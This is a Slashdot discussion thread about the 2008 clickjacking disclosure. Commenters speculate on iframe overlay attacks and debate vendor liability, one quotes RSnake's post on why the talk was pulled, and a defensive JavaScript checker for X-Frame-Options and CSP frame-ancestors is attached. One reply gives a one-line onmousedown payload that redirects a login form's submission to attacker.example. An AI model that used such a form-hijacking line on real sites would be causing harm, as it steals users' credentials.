  24. viral browser market cleaning by sarbrot · · Score: 2, Insightful

    ok - i read TFA, scanned all the links blogs, their trackbacks and comments and from what i've seen there is no real info on what this is. Thinking about it for 2 minutes I had this idea that this will be best chance ever to get rid of IE6. My hope is that all the browser vendors (including MS) have conspired that maybe 3 weeks of making scary "clickjacking" news and pushing them to the main media outlets will eventually raise awareness to let go of that horrible thing that's keeping the web from really evolving. finally a good excuse to disable your content for outdated browsers that aren't patched any more because the user might accidentally the whole clickjack. But in the end - if the download links don't get clickjacked that is - MS will probably release some stupid patch that prevents IE6 from clickjacking altogether and it will be 3 more years before IE6 leaves for good....

    1. Re:viral browser market cleaning by atraintocry · · Score: 1

      They don't need a conspiracy. Security problems like this are exactly *why* running an old (well, old and unsupported) browser is asking for problems. Of course, IE6 on XP SP2 is supported by Microsoft for the time being, despite its age, so it's going to be something we have to put up with for the time being.

      Too bad they don't just patch the renderer :D

  25. Absolutely fascinating by Anonymous Coward · · Score: 0

    I'm expecting this gem to be the next Rickroll. Thanks MST3K. :)

  26. Scary? by pyrr · · Score: 4, Insightful

    I'm trying to think of the ways this could be used to cause harm, so far the biggest threat I see is to the pay-per-click ad model, since this would be great for clickfraud. Other than that, a website could bounce you to another page on their site that you didn't intend to go to, and possibly overwhelm your browser & bandwidth with a redirect loop. I can see a hint of an issue in the way frames might be used with this exploit and 3rd-party sites (as noted in the article), but that seems to be a bit of a stretch since the original site would still be sending someone away from their site in another redirect. Plenty of sites who make the choice to be annoying already make you go through a little effort to break out of their frames when you go to an external site from one of their links, it's not the end of the world.

    I'd like to hear other folks' ideas on ways this may be used for an exploit that could do damage to anything other than Google's bottom-line. Until I hear a more compelling one, this exploit doesn't strike me as being the least bit "scary". A "small potential nuisance" might be a more apt description, since it would be fairly simple for end users to just ignore its effects.

    1. Re:Scary? by Anonymous Coward · · Score: 0

      So that wasn't you who purchased 200 plastic vaginas on ebay?

    2. Re:Scary? by Idaho · · Score: 1

      I'm trying to think of the ways this could be used to cause harm, so far the biggest threat I see is to the pay-per-click ad model [..]

      If you really have trouble thinking of ways in which this can cause harm more serious than pay-per-click fraud, I really hope your job does not involve making many security-related decisions.

      OK, to be a bit more constructive about it, have you read Bruce Schneier's article The Security Mindset? If none of his examples make you think "well, I would have thought of that, given a minute", you are a very trusting person ;) Your life will probably be the better for it -- except in those cases where you get screwed by misplaced trust.

      --
      Every expression is true, for a given value of 'true'
    3. Re:Scary? by Nathanbp · · Score: 2, Interesting

      How about if a malicious site puts amazon.com in a iframe positioned so as to induce you to hit the 1-click order button on some expensive camera or something? Using an Amazon referral link to themselves, of course.

    4. Re:Scary? by ThreeGigs · · Score: 2, Interesting

      It apparently doesn't have to redirect you away from the 'main' page you're seeing. It can all happen in a 'hidden' iFrame.

      I can think of a lot of web pages where clicking could have a real effect. Especially on sites where users keep themselves logged in. It appears as if they can direct your click to any spot or object on the 3rd party site.

      Ready to DIGG a story you know nothing about?
      Bid on an eBay auction?
      Delete all your old Yahoo/Gmail messages?
      What about any site that uses GETs to send a message to the server?
      And a really scary thought... can this exploit target pages on the local machine?

    5. Re:Scary? by Anonymous Coward · · Score: 0

      onmousedown="document.getElementById('SuperSecureLoginForm').action = 'https://attacker.example/pwn'"

      Easily used on a non-HTTPS login page that the developer thought was secure because the action was HTTPS.

    6. Re:Scary? by pyrr · · Score: 1

      Does a website have any influence over a frame, embedded or otherwise? Unless things have changed in recent iterations of html usage, I believe the answer is "no".

    7. Re:Scary? by pyrr · · Score: 1

      You could Digg a story you know nothing about. Sucks for Digg, time for more captchas or something.

      You could not bid on an eBay auction-- the exploit apparently can only force you to click on links within its own page. Any sort of frames, whether embedded or not, are discrete pages and unless demonstrated otherwise, the primary page can't do anything to them via this script.

      If anyone can embed a direct One-click purchasing link on their own webpages to an Amazon product, you could be buying it. If One-click is implemented like that, Amazon is incredibly stupid. I'm under the impression you can only One-click purchase from the appropriate links on the Amazon website, but I choose not to play with fire when it comes to such "conveniences", so I don't know exactly how One-click actually works.

      The exploit would not be able to delete your emails from any webmail utility unless they have an allowance for 3rd-party interfaces, much as the above situation.

      It would be atrociously bad design for any site to use simple GET commands to do anything more than fetch pages. Anything that requires a login or other user interaction would defeat this exploit.

      This exploit could target pages on your local machine, sure! You'd have to code it into the html yourself. Or have a website on your local machine-- the remote site could plug your own IP into a force-clicked link and show you your own site.

      The key is understanding the limitations of the protocols and languages involved. Let's not let our imaginations run wild here until the facts are out. Until I have more details that might show otherwise, this exploit simply doesn't seem to have the ability to do anything more than click links in the page you've just loaded without your consent. That means that the exploit:

      • Has to be written into the html on the page you're visiting.
      • Has no influence on any pages that it hasn't been coded into. All it appears to be able to do is issue GET commands without interaction from the end user.
    8. Re:Scary? by pyrr · · Score: 1

      I'm quite security-minded, thanks! :)

      The thing with this exploit is, based on the available information (or lack thereof), and possessing knowledge of what HTML can do and what its limitations are, there's no reason to get hysterical regarding what it "might" be able to do. The key to being security-minded is to analyze the situation, have a good feel for the possibilities. Hysteria-based security is nothing more than a distraction.

      Ignorance breeds hysteria. In this example, I have a reasonably good working knowledge of what HTML can do and what it can't. Analyzing the situation, the range of browsers it affects (and doesn't!), and the statements that it doesn't appear to have anything to do with plugins such as Java or Flash tells me a bit about the level it's written at. Assembling these pieces, I have a pretty good idea of what the exploit does. Can it do more than my understanding of it would indicate? Quite possibly, especially if HTML and the more basic webscripting I know is outdated enough.

      We'll see how it turns out-- I'm not trusting enough to believe this hysteria is anything meaningful. It could change folks' browsing habits a bit in the short term, and browsers should be patched to stop the exploit. But no, at this point it just doesn't seem like the sky is falling. I'm not scared because the evidence so far just isn't that compelling.

    9. Re:Scary? by pyrr · · Score: 1

      HTTPS =/= "secure"

      That's the first problem. HTTPS is only a protocol. The ONLY thing it does is prevent folks from sniffing the traffic between the server and your browser. Pages still have to be constructed competently for them to be secure. If a developer is not being careful about the links he's embedding in a webpage, then competence is the primary issue.

      There are plenty of little tricks that require a modicum of prudence in order to thwart. It's a matter of how much someone trusts a website, and making sure certificates are correct.

    10. Re:Scary? by religious+freak · · Score: 1

      Since I don't know the exact nature of the security hole and I didn't read TFA, my idea may not work, but assuming the clickjackEE is at a banking site, the hijacker could potentially create a link which posts data to a different url the jackEE didn't anticipate. This could send the form data (or whatever) to phishers, perhaps including things like account numbers, or if you're posting a password perhaps grabbing that as well (assuming you could shove a certificate in somehow).

      I dunno, but seeing as how you just got mainly pointless comments and ridicule with little support, you may have a point.

      --
      If you can read this... 01110101 01110010 00100000 01100001 00100000 01100111 01100101 01100101 01101011
  27. zomg Flash is insecure by RockMFR · · Score: 2, Funny

    Details at 11.

  28. Think about it... by IrishLimey · · Score: 0

    Ever almost accidentally click on an AD that had popped up just as you were going to click on a link?

  29. Why is this a problem? by Jimmyisikura · · Score: 0

    If it hijacks clicks IN browser, you just use alt-f4 to close it down, most people won't even have loaded the page by then. I don't understand how this is worse than malicious redirects. And since most websites people rely on use flash/scripts, I don't see the use in cutting scripts off.

  30. Re:There is nothing to see here.... by X0563511 · · Score: 1

    That doesn't work. I didn't click and I don't feel either way about not clicking. Meh.

    --
    For large sets, this will be our guide even unto death, for the LORD will work for each type of data it is applied to...
  31. What is missing is accountability. by bboxman · · Score: 1

    The coverage here sounds overhyped. Hype aside, the true nature of the problem is that software vendors are not held accountable to defects in their products (by drafting EULAs that basically negate any responsibility to any such defect).

    We'd have fewer exploits if vendors, such as M$, were held liable to any damage incurred by their customers.

    1. Re:What is missing is accountability. by McGiraf · · Score: 1

      What about free software in this context? If you lose money because of a bug in the Linux kernel you send a bill to all the contributors? Or you put a law that only registered distributors can distribute software? And if you changed one line in an open source app and recompiled it, who is responsible now?

    2. Re:What is missing is accountability. by pavera · · Score: 1

      yeah, and we'd have 0 open source software, and a lot less software in general, and it would be massively expensive.

      If MS was liable for damages when someone hacks their systems... well, let's just say code red would have put even MS out of business, I'm sure that nasty little worm caused at least 20-30 billion in damages. Certainly companies would argue that it did.

    3. Re:What is missing is accountability. by bboxman · · Score: 1

      Some exception should be given to something that is received free of charge. Just as you don't check the teeth of a horse given as a gift, you shouldn't rely on the durability of free software (which is great!). However, if you pay someone for their services, then they should be liable for the quality of their product. Security exploits and hacks are not "exploits" -- they are (usually) defects in the software. Bugs don't happen, people cause bugs by reckless behavior. We would have a higher standard of coding if companies were held liable to buffer overflows carelessly written in by their engineers. We might even have better engineers -- this would probably weed out those 20% of engineers who are responsible for 80% of gross defects.

  32. DETAILS OF THE EXPLOIT! by Anonymous Coward · · Score: 1, Funny

    The exploit was first discovered at about 7:30 am after blogger Ryan Naraine's boss noted several "odd" adult sites appeared in Mr. Naraine's browser history.

    So far, the exploit seems confined to browsers on Mr. Naraine's desktop, so users of affected browsers are urged to apply all public OS/browser patches and to stay away from Ryan's desktop.

  33. And Crome? by DeltaQH · · Score: 1, Interesting

    Is crome affected? ;-)

    1. Re:And Crome? by carlmenezes · · Score: 1

      This was my first thought. Given all the recent news about Google going to great lengths to secure the Chrome browser (to the point of being accused of reverse engineering Windows and breaking the EULA), this was the first question on my mind.

      --
      Find a job you like and you will never work a day in your life.
  34. I've seen this as a bug by Skapare · · Score: 4, Interesting

    I've seen situations that otherwise look like benign layout bugs, where two or more hyperlinks or other clickable objects end up being overlaid on each other. It's not clear which one would be activated until you click. If someone intentionally did this AND obscured the object they wanted the victim to click, and made the other object more attractive, people might be doing such clicking. This could be easily done with CSS on one page, but there's no advantage since both links are just part of the same page. I don't think frames would do this. However, IFRAMES might do this on a cross "page" basis. The perp makes an attractive link that overlays over an iframe that is loaded from another page, so the act of clicking gets the victim to effectively click on the other page. This loads something else in the iframe, but from the perspective of that other web site, it was a click on their page (based on the referer value). The simple exploit would get people to click on an ad, and it would not be visible to the ad vendor which page was doing the exploit.

    --
    now we need to go OSS in diesel cars
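    The iframe scenarios raised in the "Scary?" thread above (Nathanbp's 1-click frame, ThreeGigs' hidden iframe) and the cross-page overlay Skapare describes all come down to one question for a site operator: can another origin put my page inside a frame at all? The block below is an added example, not code from this thread, from ZDNet, from ha.ckers.org or from any browser vendor. It evaluates the two response headers browsers use to answer that question, X-Frame-Options (DENY, SAMEORIGIN and the obsolete ALLOW-FROM) and the frame-ancestors directive of Content-Security-Policy, for a given page origin and embedding origin. All origins and header sets used in it (bank.example, partner.example, attacker.example) are constructed sample values.

```javascript
// Added example (not code from the Slashdot thread, ZDNet, or ha.ckers.org):
// given a page's HTTP response headers, decide whether a given top-level
// origin may load the page in a frame. Implements X-Frame-Options (DENY,
// SAMEORIGIN and the obsolete ALLOW-FROM) and the CSP frame-ancestors
// directive. All origins used below (bank.example, partner.example,
// attacker.example) are constructed sample values.

const DEFAULT_PORT = { http: '80', https: '443' };

// Split "scheme://host[:port]" into parts, filling in the scheme's default port.
function splitOrigin(origin) {
  const u = new URL(origin);
  const scheme = u.protocol.slice(0, -1);
  return { scheme, host: u.hostname.toLowerCase(), port: u.port || DEFAULT_PORT[scheme] || '' };
}

function sameOrigin(a, b) {
  return a.scheme === b.scheme && a.host === b.host && a.port === b.port;
}

// Source list of the frame-ancestors directive, or null when the directive is
// absent. An empty list is returned as [] and is treated like 'none'.
function parseFrameAncestors(csp) {
  if (!csp) return null;
  for (const directive of csp.split(';')) {
    const tokens = directive.trim().split(/\s+/).filter(Boolean);
    if (tokens.length > 0 && tokens[0].toLowerCase() === 'frame-ancestors') return tokens.slice(1);
  }
  return null;
}

// Does one CSP source expression match the embedding (top-level) origin?
function sourceMatches(expr, embedder, page) {
  const src = expr.toLowerCase();
  if (src === "'none'") return false;
  if (src === "'self'") return sameOrigin(embedder, page);
  if (src === '*') return true;
  if (/^[a-z][a-z0-9+.-]*:$/.test(src)) return embedder.scheme === src.slice(0, -1); // scheme-source, e.g. "https:"
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([a-z0-9.-]+)(?::(\d+|\*))?$/.exec(src);
  if (!m) return false; // an unparseable source grants nothing
  const [, scheme, wildcard, host, port] = m;
  if (scheme) {
    // an explicit scheme must match; an http source also admits https embedders
    if (scheme !== embedder.scheme && !(scheme === 'http' && embedder.scheme === 'https')) return false;
  } else if (embedder.scheme !== page.scheme && embedder.scheme !== 'https') {
    return false; // no scheme given: the page's own scheme, or https, is implied
  }
  if (wildcard ? !embedder.host.endsWith('.' + host) : embedder.host !== host) return false;
  if (port === '*') return true;
  if (port) return embedder.port === port;
  return embedder.port === DEFAULT_PORT[embedder.scheme];
}

// headers: object keyed by lower-case header name. A frame-ancestors
// directive, when present, governs and X-Frame-Options is ignored, which is
// how browsers that support CSP frame-ancestors behave.
function mayBeFramed(headers, pageOrigin, embedderOrigin) {
  const page = splitOrigin(pageOrigin);
  const embedder = splitOrigin(embedderOrigin);
  const ancestors = parseFrameAncestors(headers['content-security-policy']);
  if (ancestors !== null) {
    const allowed = ancestors.some((s) => sourceMatches(s, embedder, page));
    return { allowed, reason: `CSP frame-ancestors ${ancestors.join(' ') || "(empty, treated as 'none')"}` };
  }
  const xfo = (headers['x-frame-options'] || '').trim();
  if (!xfo) return { allowed: true, reason: 'no X-Frame-Options and no frame-ancestors: any site may frame this page' };
  const [token, arg] = xfo.split(/\s+/);
  switch (token.toUpperCase()) {
    case 'DENY':
      return { allowed: false, reason: 'X-Frame-Options: DENY' };
    case 'SAMEORIGIN':
      return { allowed: sameOrigin(embedder, page), reason: 'X-Frame-Options: SAMEORIGIN' };
    case 'ALLOW-FROM': {
      let allowed = false;
      try { allowed = sameOrigin(embedder, splitOrigin(arg)); } catch (e) { allowed = false; }
      return { allowed, reason: `X-Frame-Options: ALLOW-FROM ${arg || ''} (obsolete; browsers without support ignore it)` };
    }
    default:
      // Browsers ignore a value they do not recognise, so the page stays framable:
      // report it as unprotected rather than silently treating it as DENY.
      return { allowed: true, reason: `unrecognised X-Frame-Options value "${xfo}" is ignored by browsers` };
  }
}

if (typeof require !== 'undefined' && require.main === module) {
  // Constructed sample: a login page protected only by X-Frame-Options.
  const sample = { 'x-frame-options': 'SAMEORIGIN' };
  for (const top of ['https://bank.example', 'https://attacker.example']) {
    const r = mayBeFramed(sample, 'https://bank.example', top);
    console.log(`${top} framing https://bank.example -> ${r.allowed ? 'ALLOWED' : 'blocked'} (${r.reason})`);
  }
}
```

    Run with `node framecheck.js` to see the two sample verdicts. Two points from the code are worth keeping in mind when auditing a site's responses: when both headers are sent, a supporting browser decides on frame-ancestors and never consults X-Frame-Options, so a permissive CSP silently overrides a strict DENY; and an X-Frame-Options value a browser does not recognise is dropped rather than treated as DENY, which is why the checker reports such a page as framable.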
    1. Re:I've seen this as a bug by GuldKalle · · Score: 1

      Or you could overlay the rest of the iframe page to put the link in another context

      --
      What?
    2. Re:I've seen this as a bug by lamapper · · Score: 1

      I've seen situations that otherwise look like benign layout bugs, where two or more hyperlinks or other clickable objects end up being overlaid on each other. It's not clear which one would be activated until you click. I...which page was doing the exploit.

      I have seen this too, since I use Linux and FireFox (FF) I just assumed that the web designer had done something that was Internet Explorer (IE) and/or Active X specific. And therefore was not rendering correctly in other browsers FireFox, Opera, Safari, Konqueror, etc... after all there are more than 13 browsers out there for use and I know that many designers don't test even on one additional browser, but good designers (and testers) do.

      I have seen this on the news pages when linking from one article to what I believe to be background and related information from another article, while usually on the same website, occasionally the URL shows another website. I admit that I don't always trust the URL displayed as I understand how the status line of the browser can be changed.

      It was irritating to have the text, menus, images overlaid and I figured it was simply poor web design and poor web coding practices with inadequate cross browser testing. Now I am starting to wonder if it was something more!

      I have to admit it reminds me of a couple of well known sites that 'scroll' a box as you read an article trying to get you to do something. I hate those things and avoid them like the plague. If there is an alternative news source I stop using sites that use those coding techniques.

      My favorite technique for getting rid of these boxes, admittedly does not work if a new tab is not created, is when there is a new 'tab' in my PC's action bar at the bottom of my screen. I point to this new tab with my mouse + right-click and select CLOSE. I stopped using the X CLOSE Box option on any object that either pop-ups or appears when I learned that they can be reprogrammed to do other nasty things while not showing you anything on the status line of the browser.

      One site, 0 and catch (one word) is a free site that lets people put up websites for free as long as they accept advertising on their sites. I checked it out over 8 years ago, but did not use it for the reason I am about to tell you here. Initially the site allowed you to select between popup ads and advertising buttons at the top or bottom. You did not have to select both. Later they forced popup ads on anyone using free accounts. You could pay and the advertisement would supposedly be removed. While I still believe a free use for advertising model can work, the idea of forcing popups without being able to opt out of them sucks. We all hate popup advertising, the only thing worse than popups are those dang dynamic ads that lock up your browser while they fly information across the screen...I really hate those. Like I need to see Tinker Bell fly across my screen anyway....NOT. Anyway on the 0 + catch site I saw a popup ad, but instead of the X CLOSE box performing a close as advertised and expected, when you looked at the status line in the browser it was going to run some executable (.exe) file on your computer. It was over six years ago so I don't remember whether or not that executable had been downloaded or if it would have downloaded itself. I did not know back then, what I know now about browser objects, thankfully the scammer / phisher / cracker that had written it did not change the status message or I might have accidentally hosed myself by clicking the X to close the popup. To this day I will not TRUST a close button on any website, rather using my browser's method of closing any object that I want to get rid of.

      I wish I had a list of sites that others could check to see what I saw, but did not bother writing any of them down. My guess is that if you are using IE you may not see the overlays, but now I wonder. I suppose that might be one way to know if it is poor web design versus phishing and scamming, but who

      --
      Is your Internet Throttled? Install DD-Wrt, OpenWRT or Tomato to learn the truth! Google: 1Gbps/1Gbps: 5 Communities
  35. My take by Spy+der+Mann · · Score: 4, Informative

    From google cache:

    Clickjacking

    There's been a bit of drama over the last week or so around the upcoming world OWASP conference in New York. It's surrounding a talk that Jeremiah and I were planning on doing the first day of the conference. Jeremiah and I have been working on some interesting browser security issues which also affect a lot of downstream people/websites/technologies as well. Sounds like a good talk right? We thought so too!

    Alas, it turns out that some of the issues we found weren't just a little bad - they were a lot bad. So bad, in fact, that we felt compelled to do some responsible disclosure. One issue led into another issue into another and poof - we have at least two and probably more incoming vendor patches at a yet to-be-determined date. And we've only worked with a few vendors. So... yah. It's pretty bad.

    As you may have guessed the first is a browser company, Microsoft (to be expected since it's a browser issue to begin with). The second is Adobe - who have been working closely with us on this one since we first told them about the problem. We have been working on proof of concept code since before Blackhat and finally got our ducks in a row with real working exploit code a few weeks ago. And that is pretty much when the problems started. None of the issues we found relating to the browser were particularly easy to fix, it turns out.

    The related issues we found that affect websites (instead of browsers) are thankfully slightly easier to deal with on a one-off basis, but that too is going to be a problem. There are a lot of much easier hacks out there against websites for sure, but what we've been working on breaks some previously good security measures. The correct solve will not be patching every web-site on earth. Instead it will likely end up being a browser patch against every major browser. The idea of every webmaster in the world patching their own sites is a non-starter. Although I'm sure lots of people are going to run out and patch their sites rather than wait for the normal browser patch and release cycle for all browsers everywhere. We've discussed the high level concern with both Microsoft and Mozilla and they concur independently that this is a tough problem with no easy solve in sight at the moment.

    So, after much deliberation we opted to pull our speech voluntarily, due to the extremely neutered information we'd have to be sharing. We'd much rather share the full breadth of what we found when it can be discussed more openly as to not diminish the danger of the flaw by only talking about small parts of the issue. There will still be holes in many websites due to this problem even after the short term patches are available, but we'd rather a few of the more critical problems get patched before we go public.

    However, I must stress, this is not an evil "the man is trying to keep us hackers down" situation, a la Michael Lynn vs. Cisco, or Chris Paget vs. HID, or MIT vs. MBTA and so on. We proactively decided it was better to pull the speech ourselves for the time being and for anyone who was looking forward to the speech all I can say is I hope to make it up to you once the vendors are in a better spot. It wasn't an easy decision but it really feels like the best option we have given the current situation. If you're desperate for a way to patch your browser from the issue disable scripting and plugins for the time being. More to come.

    This entry was posted on Monday, September 15th, 2008 at 5:36 pm and is filed under Webappsec. You can leave a response as well.

    And from the Adobe report:

    Thanks to Jeremiah Grossman and Robert "RSnake" Hansen

    Robert "RSnake" Hansen and Jeremiah Grossman recently shared with us some information they were planning to include in an upcoming presentation at the OWASP NYC AppSec confer

  36. IPhone Users Rejoice! by Vandil+X · · Score: 1

    ...the lack of Flash support in Mobile Safari is now a security feature!

    --
    Up, Up, Down, Down, Left, Right, Left, Right, B, A, START
  37. The devil is in the details by Ambush+Commander · · Score: 5, Informative

    In its most primitive form, it basically involves taking an iframe, figuring out where the link part/form part is, and then tricking the user into clicking it.

    This seems very clunky and hacky, but I suspect that the speakers at the OWASP talk have gotten this technique to work well enough so that it is both transparent and highly effective. Can you think of a website that needs you to click, say, a play button in order to view content? That click may be hijacked through an invisible iframe to execute an action on another website.

    The good folks at Google recently raised this topic on the WHATWG mailing list, you can read more about it here: http://lists.whatwg.org/pipermail/whatwg-whatwg.org/2008-September/016284.html

    1. Re:The devil is in the details by zuperduperman · · Score: 1

      I'm trying to figure out how this iframe trick can be a true exploit that goes beyond your normal phishing type scenario.

      If the user is visiting a malicious domain then it will show that in the browser URL bar. No amount of iframe trickery will (or should) change what they see in the location bar. If the user is willing to do sensitive things with a bad domain in the location bar then they are basically up for any kind of phishing attack, and I'm not too worried about that.

      On the other hand if it somehow puts the trusted domain in the location bar and then lets an attacker overlay the page with their own contents then I'm very scared.

      So - does this trick do something more than slightly better phishing, or not?

    2. Re:The devil is in the details by Ambush+Commander · · Score: 1

      Well, the point about the attack is the user doesn't know they're being phished. They think they're just pressing play on a video box, or following a link, or some other innocuous action on a perfectly reasonable, anonymous website on the web.

      It's a bit like CSRF, except the browser has no way of telling whether or not the click through the iframe was legitimate or not, whereas with CSRF you could at least detect whether or not the form submission came from the same website. A clickjack is functionally equivalent to the user going to that website and making the action of their own accord.

      It is most certainly fixable, but it is not, which is why it's a zero-day.

    3. Re:The devil is in the details by Anonymous Coward · · Score: 0

      I'm sorry, but when you click on these "visual elements" added to the IFrame, what's the referer sent to the domain??

    4. Re:The devil is in the details by Ambush+Commander · · Score: 1

      Anyone who's been in webappsec for a while will tell you that referers are notoriously unreliable. Anyway, I did a quick test and the referer is that of the previous iframe page. So if I'm browsing Google inside an iframe, Google has no way of knowing it's in an iframe except that the initial page was referred from our website (a perfectly legitimate case that could have been triggered by a link to their website).

  38. I'm still using Gopher by Anonymous Coward · · Score: 0

    I'm still using Gopher, so I'm getting a big kick out of the misfortune of all you high and mighty "web browser" people.

  39. Comment removed by account_deleted · · Score: 1

    Comment removed based on user account deletion

  40. Kill your Flash, man! by Phizzle · · Score: 0

    OK after RTFAing and reading others comments, isn't this something that can be patched by the Adoobie company? In the meantime I set my faithful Fruitfucker 2000 robot on Extreme Vigilant Flash Plugin Fuxx0ring setting.

    --
    I will not be pushed, filed, stamped, indexed, briefed, debriefed or numbered. My life is my own.
  41. Sweet, I'm already patched by mmalove · · Score: 1

    "In the meantime, the only fix is to disable browser scripting and plugins. We realize this doesn't give people much technical detail to go on, but it's the best we can do right now. "

    What's one malicious/annoying script from another? I turned them all off, years ago, and magically problems with trojans, annoying popups, and flashy/dodgy adverts all went away.

    At work, I put CNN on my restricted sites list to explicitly prohibit the site from running scripts. I'll take my biased news without the long page loads to pay your sponsors, thanks.

    Glad to hear that I patched out this zero day exploit well over 700 days ago.

    --
    You can get 15 minutes of fame, but you can go down in history for infamy.
  42. NoScript fixes it! by Thaelon · · Score: 1

    From a comment on TFA:

    NoScript in its default configuration can defeat most of the possible attack scenarios (i.e. the most practical, effective and dangerous): see this comment by Jeremiah himself: http://ha.ckers.org/blog/20080915/clickjacking/#comment-84820. ...

    --
    Question everything

  43. Errata by Spy+der+Mann · · Score: 2, Interesting

    After reading AKAImBatman's comment, I realized it's not a DOM/scripting vulnerability, but just the ability to hide a link behind flash or an animated GIF content.

    Kudos to AKAImBatman for understanding what this was about - and Kudos to the hackers for both discovering such an ingenious exploit and for working with the companies to fix it.

  44. Flashbock? by Stanistani · · Score: 2, Funny

    Is that a crisp, clean Adobe lager with a nice finish?

  45. Re:There is nothing to see here.... by Anonymous Coward · · Score: 0

    I have JavaScript disabled. Does that still count as being Rickrolled?

  46. Disabling CSS by jDeepbeep · · Score: 0

    AFAIK the only way to disable CSS is to use obsolete browsers like lynx.

    I may be wrong here but in FF doesn't View >> Page style >> No style disable CSS? IANAWD

    1. Re:Disabling CSS by zobier · · Score: 1

      You are correct.

      I currently use NoScript, CookieSafe, RefControl and Adblock; now I want a CSS preference extension. Maybe I should create a rolled-up extension "NoNothing" which administers preferences for Script, Cookies, Referrer and CSS on a site-by-site basis.

      --
      Me lost me cookie at the disco.
  47. Emergency Transfer Of Funds Required by jeff_schiller · · Score: 2, Funny

    I recommend immediately that $700B be transferred to the browser companies to fix this problem. Furthermore, we must transfer this money by end of the week with no strings attached.

  48. That's not Lynx! by Anonymous Coward · · Score: 1, Funny

    That's Google's first browser :-)

    http://googlesystem.blogspot.com/2006/03/google-browser.html

  49. Any Microsoft internet 'features' not exploitable? by guruevi · · Score: 1

    iFrames, ActiveX, Browser-as-a-desktop, external-facing daemons for internal systems... anything that isn't buggy that comes from them?

    Use object tags and use HTML or XHTML Strict people and it won't happen to you.

    --
    Custom electronics and digital signage for your business: www.evcircuits.com
  50. Doesn't that make you wish for... by houbou · · Score: 1

    the days when the internet was "stateless" and CGI's were in C? :)

    1. Re:Doesn't that make you wish for... by jDeepbeep · · Score: 0

      the days when the internet was "stateless" and CGI's were in C? :)

      HTTP isn't a stateless protocol anymore? When did this happen?

    2. Re:Doesn't that make you wish for... by Heembo · · Score: 1

      HTTP isn't a stateless protocol anymore? When did this happen?

      Someone stole my cookies! Give me back my cookies!

      --
      Horns are really just a broken halo.
  51. Re:Bullshit? Not b.s. -IFrames & Plugins + JSc by Anonymous Coward · · Score: 0

    "I don't think this exploit really exists. A cross browser cross platform exploit that doesn't use javascript?
    Won't be losing any sleep over this one."
    - by sakdoctor (1087155) on Thursday September 25, @04:26PM (#25156779) Homepage

    Well... IFrames, &/or Plugins (specifically Adobe Flash is my guess here) are what you need to worry about!

    (Though, supposedly from what I have been reading? Turning off javascript does NOT hurt, & does actually help (despite the last line of the init. post here)).

    Here is about as "close to the truth" as you'll get, due to "responsible disclosure" (rather than FULL disclosure... so, go to the guys that 'discovered it'):

    http://jeremiahgrossman.blogspot.com/2008/09/cancelled-clickjacking-owasp-appsec.html

    APK

    P.S.=> I've been telling folks to 'crank those off' (plugins &/or IFrames, as well as javascript (if you do NOT absolutely NEED IT, for proper page functionality (such as on online banking &/or shopping sites))), here, for more than a year now:

    HOW TO SECURE Windows 2000/XP/Server 2003 & even VISTA, plus, make it "fun-to-do", via CIS Tool Guidance (& beyond):

    http://www.tcmagazine.com/forums/index.php?s=67b2240128d853305689dd2c383066e8&showtopic=2662&st=0&start=0#

    apk

  52. Again the same problem by owlstead · · Score: 1

    From the first time they were invented there was some people with outspoken criticism on frames. Frames have been one of the worst security problems of the web from the start. Now we will see more and more exploits that take advantage of having content from multiple websites. And I'm not even talking about the privacy problems with frames and other cross site content.

    The best and maybe only solution is not to allow multiple servers to deliver content to the same page. If multiple servers are really needed, one could think of only allowing one host (i.e. www.host.com) and hosts ending with the same name (i.e. images1.www.host.com).

    As long as we keep seeing cross site content, it will be a nightmare to manage the security, especially since the functionality of the browsers will keep increasing (and therefore the number of attack vectors).

  53. Re:Bullshit? IFrames + Plugins & Javascript (A by Anonymous Coward · · Score: 0

    Well... IFrames, &/or Plugins (specifically Adobe Flash is my guess here) ARE what you need to worry about!

    (Though, supposedly from what I have been reading? Turning off javascript does NOT hurt, & does actually help (despite the last line of the init. post here)).

    Here is about as "close to the truth" as you'll get, due to "responsible disclosure" (rather than FULL disclosure... so, go to the guys that 'discovered it'):

    http://jeremiahgrossman.blogspot.com/2008/09/cancelled-clickjacking-owasp-appsec.html

    (Just "2nd'ing your motion", to go to the "horse's mouth")...

    APK

    P.S.=> I've been telling folks to 'crank those off' (plugins &/or IFrames, as well as javascript (if you do NOT absolutely NEED IT, for proper page functionality (such as on online banking &/or shopping sites))), here, for more than a year now:

    HOW TO SECURE Windows 2000/XP/Server 2003 & even VISTA, plus, make it "fun-to-do", via CIS Tool Guidance (& beyond):

    http://www.tcmagazine.com/forums/index.php?s=67b2240128d853305689dd2c383066e8&showtopic=2662&st=0&start=0#

    apk

  54. Re:Hurray for us W3M users! by Anonymous Coward · · Score: 0

    Except for blind people that rely on the (absence of any) layout in lynx, lynx has been superseded by w3m. Tables, frames, Unicode, and image display when $DISPLAY is available. (And no, don't suggest elinks because it can't do the latter two.)

  55. HEY I JUST TRIED IT! by A+Wise+Guy · · Score: 0

    I tried the link and I'm not affected. really! I have no plugins!

  56. re: you are fucked by AgentPhunk · · Score: 1

    This is slashdot. People here aren't supposed to know what that means..

  57. How does this differ from CSRF? by merreborn · · Score: 1

    Obviously, there's one key difference: in CSRF, the malicious activity is POSTed from a remote page. In a "clickjacking" attack, the malicious activity is POSTed actually using your own page (embedded in a remote page).

    Other than that, it's largely the same basic idea -- you trick someone into submitting an action to a remote site using their pre-existing credentials.

    The question is, is it possible to employ any well known CSRF prevention techniques to "clickjacking"?

  58. Perhaps I'm over-simplifying here... by gravyface · · Score: 1

    But could you not have a plugin/filter that would look for IFRAME src strings that != *.currentdomain.com? I'm sure there's more of a pattern or signature here that could be parsed/matched (i.e. whatever the offending CSS would be and if it applies to said IFRAME element).

    Certainly there's legitimate uses for hidden IFRAMES that point to other domains -- and I'm grossly generalizing here in my example -- but if we can accept heuristic analysis as the de facto standard for telling us whether our email is spam or not, surely there's enough incriminating evidence available to create an effective rule against exploits such as Clickjacking?

    --
    body massage!
  59. Contradiction? by jibjibjib · · Score: 1

    "... javascript is not required to exploit this."

    "The exploit requires DHTML."

    I thought DHTML was, by definition, the use of Javascript to manipulate the HTML of a web page. So, how can something require DHTML, but not Javascript?

  60. Yet another reason... by arotenbe · · Score: 1

    ... not to RTFA.

    --
    Tomato wedge sperm darts that are Republican.
  61. Re:Hurray for us W3M users! by Qzukk · · Score: 1

    it can't do the latter two.

    Unicode, maybe. But images? Click on "Google" alt text on www.google.com in debian's elinks (0.11.1) and you get

    What would you like to do with the file 'logo.gif' (type: image/gif)?

